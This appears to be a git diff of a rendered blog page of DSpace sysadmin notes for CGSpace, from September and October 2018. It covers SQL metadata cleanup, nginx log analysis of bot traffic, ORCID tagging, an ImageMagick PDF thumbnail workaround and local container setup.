<li>Peter sent me a list of 43 author names to fix, but it had some encoding errors like <code>Belalcázar, John</code> as usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)</li>
<li>I did batch replaces for both on CGSpace with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>Afterwards I started a full Discovery re-index:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Linode sent an alert that both CGSpace and DSpace Test were using high CPU for the last two hours</li>
<li>It seems to be Moayad trying to do the AReS explorer indexing</li>
@ -675,18 +675,18 @@ $ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p
<li>Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc</li>
<li>I think I should just batch export and update all languages&hellip;</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
</code></pre><ul>
<li>Then I can simply delete the &ldquo;Other&rdquo; and &ldquo;other&rdquo; ones because that&rsquo;s not useful at all:</li>
</ul>
<pre><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Other&#39;;
DELETE 6
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;other&#39;;
DELETE 79
</code></pre><ul>
<li>Looking through the list I see some weird language codes like <code>gh</code>, so I checked out those items:</li>
</ul>
<pre><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
resource_id
-------------
94530
@ -699,12 +699,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
</code></pre><ul>
<li>Those items are from Ghana, so the submitter apparently thought <code>gh</code> was a language&hellip; I can safely delete them:</li>
</ul>
<pre><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
DELETE 2
</code></pre><ul>
<li>The next issue would be <code>jn</code>:</li>
</ul>
<pre><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
resource_id
-------------
94001
@ -718,12 +718,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
<li>Those items are about Japan, so I will update them to be <code>ja</code></li>
<li>Other replacements:</li>
</ul>
<pre><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
<pre tabindex="0"><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
UPDATE metadatavalue SET text_value=&#39;fr&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;fn&#39;;
UPDATE metadatavalue SET text_value=&#39;hi&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;in&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Ja&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jp&#39;;
</code></pre><ul>
<li>Then there are 12 items with <code>en|hi</code>, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata</li>
</ul>
@ -748,15 +748,15 @@ UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_f
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -26,7 +26,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -56,12 +56,12 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -107,7 +107,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<p class="blog-post-meta">
<time datetime="2018-10-01T22:31:54+03:00">Mon Oct 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -121,7 +121,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<ul>
<li>I see Moayad was busy collecting item views and downloads from CGSpace yesterday:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
933 40.77.167.90
971 95.108.181.88
1043 41.204.190.40
@ -135,18 +135,18 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
</code></pre><ul>
<li>Of those, about 20% were HTTP 500 responses (!):</li>
</ul>
<pre><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
<pre tabindex="0"><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | grep 34.218.226.147 | awk &#39;{print $9}&#39; | sort -n | uniq -c
118927 200
31435 500
</code></pre><ul>
<li>I added Phil Thornton and Sonal Henson&rsquo;s ORCID identifiers to the controlled vocabulary for <code>cg.creator.orcid</code> and then re-generated the names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
$ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
</code></pre><ul>
<li>I found a new corner case error that I need to check, given <em>and</em> family names deactivated:</li>
</ul>
<pre><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
</code></pre><ul>
<li>It appears to be Jim Lorenzen&hellip; I need to check that later!</li>
@ -154,7 +154,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>Linode sent another alert about CPU usage on CGSpace (linode18) this evening</li>
<li>It seems that Moayad is making quite a lot of requests today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1594 157.55.39.160
1627 157.55.39.173
1774 136.243.6.84
@ -169,37 +169,37 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>But in super positive news, he says they are using my new <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a> and it&rsquo;s MUCH faster than using Atmire CUA&rsquo;s internal &ldquo;restlet&rdquo; API</li>
<li>I don&rsquo;t recognize the <code>138.201.49.199</code> IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:</li>
</ul>
<pre><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /[a-z]+&#39; | sort | uniq -c
8324 GET /bitstream
4193 GET /handle
</code></pre><ul>
<li>Suspiciously, it&rsquo;s only grabbing the CGIAR System Office community (handle prefix 10947):</li>
</ul>
<pre><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /handle/[0-9]{5}&#39; | sort | uniq -c
7 GET /handle/10568
4186 GET /handle/10947
</code></pre><ul>
<li>The user agent is suspicious too:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
</code></pre><ul>
<li>It&rsquo;s clearly a bot and it&rsquo;s not re-using its Tomcat session, so I will add its IP to the nginx bad bot list</li>
<li>I looked in Solr&rsquo;s statistics core and these hits were actually all counted as <code>isBot:false</code> (of course)&hellip; hmmm</li>
<li>I tagged all of Sonal and Phil&rsquo;s items with their ORCID identifiers on CGSpace using my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Where <code>2018-10-03-add-orcids.csv</code> contained:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Henson, Sonal P.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Henson, S.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Thornton, P.K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phil&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip K.&quot;,Philip Thornton: 0000-0002-1854-0182
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Henson, Sonal P.&#34;,Sonal Henson: 0000-0002-2002-5462
&#34;Henson, S.&#34;,Sonal Henson: 0000-0002-2002-5462
&#34;Thornton, P.K.&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Philip K&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phil&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Philip K.&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phillip&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phillip K.&#34;,Philip Thornton: 0000-0002-1854-0182
</code></pre><h2 id="2018-10-04">2018-10-04</h2>
<ul>
<li>Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)</li>
@ -214,7 +214,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>So it&rsquo;s fixed, but I&rsquo;m not sure why!</li>
<li>Peter wants to know the number of API requests per month, which was about 250,000 in September (excluding statlet requests):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E &#39;Sep/2018&#39; | grep -c -v &#39;statlets&#39;
251226
</code></pre><ul>
<li>I found a logic error in the dspace-statistics-api <code>indexer.py</code> script that was causing item views to be inserted into downloads</li>
@ -242,8 +242,8 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>Peter noticed that some recently added PDFs don&rsquo;t have thumbnails</li>
<li>When I tried to force them to be generated I got an error that I&rsquo;ve never seen before:</li>
</ul>
<pre><code>$ dspace filter-media -v -f -i 10568/97613
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
<pre tabindex="0"><code>$ dspace filter-media -v -f -i 10568/97613
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf&#39; @ error/constitute.c/ReadImage/412.
</code></pre><ul>
<li>I see there was an update to Ubuntu&rsquo;s ImageMagick on 2018-10-05, so maybe something changed or broke?</li>
<li>I get the same error when forcing <code>filter-media</code> to run on DSpace Test too, so it&rsquo;s gotta be an ImageMagick bug</li>
@ -251,7 +251,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>Wow, someone on <a href="https://twitter.com/rosscampbell/status/1048268966819319808">Twitter posted about this breaking his web application</a> (and it was retweeted by the ImageMagick account!)</li>
<li>I commented out the line that disables PDF thumbnails in <code>/etc/ImageMagick-6/policy.xml</code>:</li>
</ul>
<pre><code> &lt;!--&lt;policy domain=&quot;coder&quot; rights=&quot;none&quot; pattern=&quot;PDF&quot; /&gt;--&gt;
<pre tabindex="0"><code> &lt;!--&lt;policy domain=&#34;coder&#34; rights=&#34;none&#34; pattern=&#34;PDF&#34; /&gt;--&gt;
</code></pre><ul>
<li>This works, but I&rsquo;m not sure what ImageMagick&rsquo;s long-term plan is if they are going to disable ALL image formats&hellip;</li>
<li>I suppose I need to enable a workaround for this in Ansible?</li>
@ -261,7 +261,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>I emailed DuraSpace to update <a href="https://duraspace.org/registry/entry/4188/?gvid=178">our entry in their DSpace registry</a> (the data was still on DSpace 3, JSPUI, etc)</li>
<li>Generate a list of the top 1500 values for <code>dc.subject</code> so Sisay can start making a controlled vocabulary for it:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-10-11-top-1500-subject.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-10-11-top-1500-subject.csv WITH CSV HEADER;
COPY 1500
</code></pre><ul>
<li>Give WorldFish advice about Handles because they are talking to some company called KnowledgeArc who recommends they do not use Handles!</li>
@ -269,27 +269,27 @@ COPY 1500
<li>Altmetric support responded to say no, but the reason is that Land Portal is doing even more strange stuff by not using <code>&lt;meta&gt;</code> tags in their page header, and using &ldquo;dct:identifier&rdquo; property instead of &ldquo;dc:identifier&rdquo;</li>
<li>I re-created my local DSpace database container using <a href="https://github.com/containers/libpod">podman</a> instead of Docker:</li>
</ul>
<pre><code>$ mkdir -p ~/.local/lib/containers/volumes/dspacedb_data
<pre tabindex="0"><code>$ mkdir -p ~/.local/lib/containers/volumes/dspacedb_data
$ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ sudo podman start dspacedb
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository</li>
<li>I can pull the <code>docker.bintray.io/jfrog/artifactory-oss:latest</code> image, but not start it</li>
<li>I decided to use a Sonatype Nexus repository instead:</li>
</ul>
<pre><code>$ mkdir -p ~/.local/lib/containers/volumes/nexus_data
<pre tabindex="0"><code>$ mkdir -p ~/.local/lib/containers/volumes/nexus_data
$ sudo podman run --name nexus -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
</code></pre><ul>
<li>With a few changes to my local Maven <code>settings.xml</code> it is working well</li>
<li>Generate a list of the top 10,000 authors for Peter Ballantyne to look through:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 3 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 10000) to /tmp/2018-10-11-top-10000-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 3 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 10000) to /tmp/2018-10-11-top-10000-authors.csv WITH CSV HEADER;
COPY 10000
</code></pre><ul>
<li>CTA uploaded some infographics that are very tall and their thumbnails disrupt the item lists on the front page and in their communities and collections</li>
@ -301,7 +301,7 @@ COPY 10000
<li>Look through Peter&rsquo;s list of 746 author corrections in OpenRefine</li>
<li>I first facet by blank, trim whitespace, and then check for weird characters that might be indicative of encoding issues with this GREL:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -311,7 +311,7 @@ COPY 10000
</code></pre><ul>
<li>Then I exported and applied them on my local test server:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t CORRECT -m 3
</code></pre><ul>
<li>I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay&rsquo;s author controlled vocabulary</li>
</ul>
@ -321,7 +321,7 @@ COPY 10000
<li>Switch to new CGIAR LDAP server on CGSpace, as it&rsquo;s been running (at least for authentication) on DSpace Test for the last few weeks, and I think the old one will be deprecated soon (today?)</li>
<li>Apply Peter&rsquo;s 746 author corrections on CGSpace and DSpace Test using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode19) and reboot the server</li>
<li>After rebooting the server I noticed that Handles are not resolving, and the <code>dspace-handle-server</code> systemd service is not running (or rather, it exited with success)</li>
@ -352,24 +352,24 @@ COPY 10000
</li>
<li>I ended up having some issues with podman and went back to Docker, so I had to re-create my containers:</li>
</ul>
<pre><code>$ sudo docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
<pre tabindex="0"><code>$ sudo docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><h2 id="2018-10-16">2018-10-16</h2>
<ul>
<li>Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:</li>
</ul>
<pre><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN &#39;dc&#39; WHEN metadata_schema_id=2 THEN &#39;cg&#39; END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
</code></pre><ul>
<li>Talking to the CodeObia guys about the REST API I started to wonder why it&rsquo;s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it</li>
<li>Interestingly, the speed doesn&rsquo;t get better after you request the same thing multiple times; it&rsquo;s consistently bad on both CGSpace and DSpace Test!</li>
</ul>
<pre><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.35s user 0.06s system 1% cpu 25.133 total
0.31s user 0.04s system 1% cpu 25.223 total
@ -377,7 +377,7 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
0.20s user 0.05s system 1% cpu 23.838 total
0.30s user 0.05s system 1% cpu 24.301 total
$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.22s user 0.03s system 1% cpu 17.248 total
0.23s user 0.02s system 1% cpu 16.856 total
@ -389,7 +389,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
